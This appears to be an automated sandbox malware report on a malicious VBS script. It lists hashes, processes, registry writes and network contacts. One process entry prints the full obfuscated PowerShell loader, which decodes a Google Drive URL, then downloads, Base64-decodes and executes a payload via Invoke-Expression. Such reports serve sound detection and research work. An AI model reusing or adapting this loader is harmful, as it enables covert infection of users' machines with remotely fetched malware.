| File name: | 13afd75bb3eba73c51c030cb64575e75d1f584dd9981ac435d1886718a9d936e.vbs |
| Full analysis: | https://app.any.run/tasks/5563300a-788b-41af-a798-9e25aac2a801 |
| Verdict: | Malicious activity |
| Analysis date: | March 21, 2024, 18:01:27 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Indicators: | |
| MIME: | text/plain |
| File info: | ASCII text, with CRLF line terminators |
| MD5: | 4DE94001DAF4CEA18C58A66A5C61157B |
| SHA1: | 87DB6B4E7910608E02532234B8A1B0CD08EBF244 |
| SHA256: | 13AFD75BB3EBA73C51C030CB64575E75D1F584DD9981AC435D1886718A9D936E |
| SSDEEP: | 6144:KLkLMX7IYSHPDvPKbhikkFnEbzM/PDiXJfljw91aVX/e+B97TpgxZFMwgwxYRsnM:Koth32KWUc |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1880 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3100 | cmd.exe /c ping 6777.6777.6777.677e | C:\Windows\System32\cmd.exe | — | wscript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3352 | "C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\13afd75bb3eba73c51c030cb64575e75d1f584dd9981ac435d1886718a9d936e.vbs" | C:\Windows\System32\wscript.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.812.10240.16384 Modules
| |||||||||||||||
| 4220 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Bombeeftersgningen=82141+3875;$Familiarised = 'set /A 1^^0';$Blegeplads = (cmd /c $Familiarised);Function Krselstider236 ($Redisturb){$Tvangsbden = 8;$Lnudgifter=$Redisturb.Length-1;For($Sygehusvalg=7; $Sygehusvalg -lt $Lnudgifter; $Sygehusvalg+=$Tvangsbden){$Forbind=$Forbind+$Redisturb.Substring($Sygehusvalg, $Blegeplads)};$Forbind;}function Jaskedes ($Endoscopes){& ($Forvaltningsrets) ($Endoscopes);}$Byzones=Krselstider236 'Poo ingTSygevarrAktio,saContra.nPig,lowsAttrapefLissajoeDrumm,rrRkkevisr BefjeliBluffesnBand magRendema ';$Fordkket=Krselstider236 'Fladse,hAlcadebtApplikat CesiumpBortforsBerli.e:Unbutte/Gysene /Bjl elodExsuperrProgeniiCon onav con,eseMicki o.Fagra.dgFremlyso Sph.nooIllegitgD.earill mppireeHaemo.t.ProjektcIndgravo Fa,lenmOddfel,/to emmeuMascledcAstr.ld?ShadoweeGreif,kx Garg.lpWestingoalluv arPomat mtGrsrods= AcervadT uroesoRejsesewKrad.brnSprringlLawineho Crea.eaForl stdApsisse&EksakteiPeplumvdBakteri=Grandgo1AmphictFGlimmerJindustr2Dukkemi3RhagadehMagnetoySpill thSolhverMDimlyan0Swor.fiJFormrkbPVildkatV TirsdaBZamboerJProvokaZPs udot5EmissioEGip,banC em,nciYKat,eoeeD xiotrAVandpesdOptr lb_Vvende.JArkivlodMultica5Rullekrv ensherf S railESkidesuyEctocy,UClow,saSBoldlys ';$Forvaltningsrets=Krselstider236 ' LejdeiiKnojerneHjspndix.ftalep ';$dialyserendes=Krselstider236 'Sikkerh$D,cryocgAcrylallTurnixbo MarsipbChummilaGard,nplChapfal:.egnstrHMonostvoAerobatrSublimenFinansil Frottwe Tr,glysgryn eesKiks,de Scottif=Baad,br Datab hSDauntlet BoglrdaMe,abolr Multi,tLampist-Roof ikBNonp.rci.rammattEarflaps OplfteTProcessr NedarvaC liceanAblenessIntri,efForsgsveCiff rtrCanniba Esturel-ClamatoSFraisefoPaavisguB grebsr Helligc OverleeFortrae Aumails$Bur.herFSubacrioHeksek,rProsecudpassionkSk,nnebkBravosseFungolotGennems S arend-OrganisD Fam lieJgerensshoflevetFladtryi SeismonEngraftaR,dsenat unt uriServilioM.lasmanadnexit Taplin$FrisrinAwhaledalFeriefltEnep,okaHema imb Frinumo aythorl B.gebrctrutinahUnmonu eSpeeduptPrimf k9Henfrt.8Retshan ';Jaskedes (Krselstider236 'Alumini$ MusefugResponslRegn.mso UnsacrbMispa.eaStorherludboren:UddanneA Be.ynglSttteortLuningeatrichinb ierstoViklingl RegnticFllesskhStrubelef.relantPicaria9slid om8 Agnos = Traile$Ghaffire,dludninEquipe vZoolog,: fskriva Prop.ip Terp rp MisstedF,rhaanaDebunketAntitesaPolytop ') ;Jaskedes (Krselstider236 'UngratiIMihara mHngelaap PrechooCharterrfotog atBld rsy- FingerMAffaldsoStumpnsdSv,redeu,nketillLekturee Roiste MoistisBSquareaiI,akisktAnernessSporehuTHydran.rBiennala Unbodin Forsl.sErhvervf.vatorieHurricarTo stil ') ;$Altabolchet98=$Altabolchet98+'\Chromatophil.Sst' ;Jaskedes (Krselstider236 'Hunnens$Futilo,g semivulSpgen,boScratchbBrutaliaSondrinl,ressmn: AmatraNSkarpheeusefulseUnd.cadkHestetyeMosquitrskinkerbEmesessr Sacrife ForpupaDiakonak QuantieShee skrAgoraersG,nfort=S rygeo(El ivagTUnmaidee Abonnessteen,dtslaties- Af,tanPhabdalaaPr tostt MasturhJujuis, Aarstid$HairstrA Caronil KiksettSphenopaoversigbAirgrapoLejevrdlUnvaluacTegltkkhBigasineCra twot Jamhak9 semia,8 Fleree) Sawto ') ;while (-not $Neekerbreakers) {Jaskedes (Krselstider236 'AchtervI U,rbejf brevfo R,akti(Hjrvrdi$ FletteHTiggerso olstrar chefden StickelSubspeceEnigmatsDetronisKrigssk.ReasonpJGrav.deoWampusjbStrim eSKundgretProlo.gaFaktorat Fuld,reTropsfr Noteap-Ordre,re,lasvrkqrugbrds cr,tino$ImproviBFores iy dgranszSkillevoNotationAfhornieHektisksTorebyt)Residen Forsvun{AfsjledSOut.idetTriticiaGammeltrElekt otSkridtl- Pa.ligSIsoth.rlForedraehuronu,eGelatinprykind. Chausse1Extensi}CroupieeSmidighl nildtcs CariboeT.igsom{KioskenS MnstertSpade.oaPhotosyrLsefrdit Kram.o- KlassiSUniverslLik erneStancheeHornbeap U,beho Hibiscu1Reballo; BlotteJCy.elanaFiretogsProtestkHovedske Skaered FluktueForgabes Rejsem Unpla.i$NascencdEndepuniUnun ulaU.tightlMuldyrfySluddetsKenderbeUnworthrDataspeeAnatolinnytaarfdBabbitteSkovbunsKaldesi}symploc ');Jaskedes (Krselstider236 ' Anlgsh$Castigag Aclydel Fr tfuoP,lamatbNo,erinaorkestel Triost: Upc.ttN B etrveS.uiggleKanoniskSkon.ereSemiab r ,inimubMelanchrNycteriePresentaV.ftesvkPlenipoeOhiauncrIndtelesKlapjag=Deutera(SalpingTsemirese BillarsArrestetTh olog-Var.efyP KatalyaBesaguetAdsorbahFl rist Stenet$UdtrtniA egnestlBanalestUncathoaEnklavebexhaustoSlaverelSpi,edacForeperh GalatieAs erixtSamdeli9 Deltas8Recusat)Paahngs ') ;}Jaskedes (Krselstider236 ' Avouch$ Ragl,ngAntjesylHegleruoBalladebFor,tuvaProprielAddedly:OligisthSnakedbuBayersksSmashupbSiaul.aa Akti in VandgadBajadselTrykkeriPandybankn.besteTrappabsProin,usUnge gr Simplis=Underg, ChimaraGFon,seje K.ggert Forplu- UdgiftCSulfoneoOverspanResponst,nderwreKvindefn HrfrettFahrenh Kap ifo$Optom tAFarin sl Sikkert Faci ia,utpushbS peraco abyrinl B,hovecA ndredhGeminateElektr.tT tfish9 In,iss8Cont,ap ');Jaskedes (Krselstider236 'Unrefre$tyveriegoecodoml Han,sko Criticb TmrersaHerskablKa,mira:RaagummTlungoo,eCodaminrTriangemAgglutioWommalagPost mbr.armoniaLyt,erff FrembreB.ckpacrSymposie Indeksn .ankfud remstie Hadedi Smidig= Sg.ehe Bjemusk[dusackbSFejltily spookisMe rolot Cubshoe PlasksmSkva,de.GemmifiCUdpu ktoAntikvinMilo.spvOxyn ureBonos drcheckedtVerdens]To,omet:Resbegr:Wo,tednF,aandborTheretooKines pmNulli oBNongrieaTressels Boc.aceIngemin6 Emu,si4 Lege,lSCo,dhabt AktiverRigspoliRevisi nBaizasrg Surmau(Reacqui$IltfatthHerretkuS,yggessTrad smbV deocaaKosteden.ornfisd Opinerl EffektiandgtignMalkondeGobiesosC ttiersPengeov)He.ioty ');Jaskedes (Krselstider236 'noticab$ Acuteng Saintol AmastaoPeriodibstrophaaTazettelDaggerb:L,ngfreRDebasinsUncaresetypewrirThul,slnDefo iaeMonopha Conf,ta= Toysho Bambus.[squibcrSDitmarsySti kersolieb.otSystemaeOpalisem.ummagy.OpfyldnTSlvskrieDependexOsteo.ytP talwi. VgtfylEAttractn DalenicNaglendo Exa.tad Frierfi .indemnEngraftgWil.rid]Ne.roma: hy.ota:,aneuveA ,noppoS tranceCAggrievIDustto,ICirklfl.DiquatsG MetaboeGale.rotdisceptS,houlertSimmersr b uskei PerifenForbavsg Ep.sco(Mistrys$ CetineTRiposteeBob tekrMed elem ugtigho uarrymgRoo.nekrTax deraKoalitifTvrdriveDihybrirOmst,eleOxeyesanAarri gd.asarise Kjrboe)Desa,in ');Jaskedes (Krselstider236 ' Picare$Eri phogKneeledlBlandino.ynkronbForenina SolemnlKl.ppen:TirebikFKrkommeoRytmer,rTransthlS,olelra ncrusheMenneskg odyintgTerraneeB.rracurCounter=Sludfu.$AflaastRTarerinsMuscioxeN madidrS,maforn,onhiereJusterv.SinglersAnvendeuiceworkbBeskytts U.stedtScoundrrBlosteriNoncognnBayr regKvajp.n(Nationh3bl dede0.hauvin6 Knleid3Ozono,e0Vi,itoo2Bornhol,Bilabia3Kalkula0picrate7Bemud.l6Fagkynd6Aburahs)Disenac ');Jaskedes $Forlaegger;" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wscript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5036 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | svchost.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6480 | ping 6777.6777.6777.677e | C:\Windows\System32\PING.EXE | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: TCP/IP Ping Command Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 6664 | "C:\WINDOWS\system32\cmd.exe" /c "set /A 1^^0" | C:\Windows\System32\cmd.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 7164 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (3352) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (3352) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (3352) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (3352) wscript.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (4220) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (4220) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (4220) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (4220) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 4220 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kzvq41jc.xb5.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 4220 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2inobloj.gpd.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
3996 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | binary | 471 b | unknown |
1260 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAzlnDD9eoNTLi0BRrMy%2BWU%3D | unknown | binary | 313 b | unknown |
4352 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA177el9ggmWelJjG4vdGL0%3D | unknown | binary | 471 b | unknown |
6216 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | binary | 409 b | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4828 | svchost.exe | 239.255.255.250:1900 | — | — | — | unknown |
1280 | MoUsoCoreWorker.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
3748 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
3996 | svchost.exe | 40.126.32.74:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
3996 | svchost.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
3996 | svchost.exe | 20.190.160.22:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
1260 | backgroundTaskHost.exe | 104.126.37.130:443 | www.bing.com | Akamai International B.V. | DE | unknown |
4352 | backgroundTaskHost.exe | 20.223.35.26:443 | arc.msn.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
1260 | backgroundTaskHost.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
4352 | backgroundTaskHost.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
Domain | IP | Reputation |
|---|---|---|
6777.6777.6777.677e |
| unknown |
ocsp.digicert.com |
| whitelisted |
settings-win.data.microsoft.com |
| whitelisted |
www.bing.com |
| whitelisted |
arc.msn.com |
| whitelisted |
drive.google.com |
| shared |
drive.usercontent.google.com |
| unknown |
slscr.update.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |